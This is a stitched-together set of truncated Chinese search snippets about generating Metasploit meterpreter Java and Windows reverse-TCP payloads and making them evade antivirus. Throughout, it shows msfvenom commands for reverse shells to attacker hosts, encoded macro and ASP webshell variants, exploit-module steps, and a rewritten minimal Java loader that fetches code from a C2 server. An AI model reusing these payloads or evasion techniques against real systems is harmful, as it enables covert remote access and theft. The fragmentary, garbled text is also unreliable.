分析msf meterpreter java马的原理,然后自己写一个保留了核心逻辑的,来达到免杀效果。 1.生成马 代码语言:javascript 复制 msf6>use java/meterpreter/reverse_tcp msf6payload(java/meterpreter/reverse_tcp)>msfvenom-p java/meterpreter/reverse_tcpLHOST=1.117.xxxxxxLPORT=4444W>text.jar 2.反编译分析源码 2.1用...
11 java/shell_reverse_tcp normal No Java Command Shell, Reverse TCP Inline 12 multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures) 13 multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTT...
setRPORT 1099 然后,你还需要设置payload来进行反向TCP shell连接,命令如下: Set payload /java/meterpreter/reverse_tcp 你可以输入show payloads来查看所有的payload。 接着我们还是输入“show options”来查看刚才设置的payload需要设置的参数。如图: 这里你可以看到缺少了LHOST,因为我们使用的是反向shell,我们需要设置...
3 java/jsp_shell_bind_tcpnormal No Java JSP Command Shell, Bind TCP Inline 4 java/jsp_shell_reverse_tcpnormal No Java JSP Command Shell, Reverse TCP Inline 5 java/meterpreter/bind_tcpnormal No Java Meterpreter, Java Bind TCP Stager 6 java/meterpreter/reverse_httpnormal No Java Meterpreter, ...
再给次机会吧,给个经典的 windows meterpreter reverse tcp 的 upx 压缩壳 检测出来了 1.3 kali strings 命令 strings 在二进制文件中查找可打印的字符串。 -a --all:扫描整个文件而不是只扫描目标文件初始化和装载段 strings -a 20191206backdoor.exe | less ...
└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe 执行完成后会生成2段代码 第一段代码是MACRO CODE [ˈmækrəʊ kəʊd]宏代码 ...
而本文的分析仅仅针对对Windows系统和reverse_tcp模式 所以这里简化的代码也仅仅针对此系统和此模式 上图就是我简化后的代码,流程更加简明,仅仅两步 建立对C2地址的套接字并获取IO流,传入bootstrap方法动态加载远程发送的文件 整个流程仅仅38行代码,仅引入4个包 ...
代码语言:javascript 复制 msf6exploit(multi/browser/java_jre17_driver_manager)>java/meterpreter/reverse_tcpInterrupt:use the'exit'command to quit msf6exploit(multi/browser/java_jre17_driver_manager)>setpaylod java/meterpreter/
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f asp > shell.asp 然后我用load()下载它:又一次Defender没有报警但它却执行失败了,同样因为它不是js文件。连msfvenom赤果果的payload都没报警我不知道还有什么需要测试了。
3.metasploit中如何建立JAVA的反向TCP连接 首先,我们用以下命令来生成“木马”: msfvenom --payload="java/meterpreter/reverse_tcp" LHOST=xxx.xxx.xxx.xxx LPORT=xxxx -t jar > java_meterpreter_reverse_tcp.jar 其中LHOST是木马回调的服务器的IP,LPORT是木马回调的服务器的端口。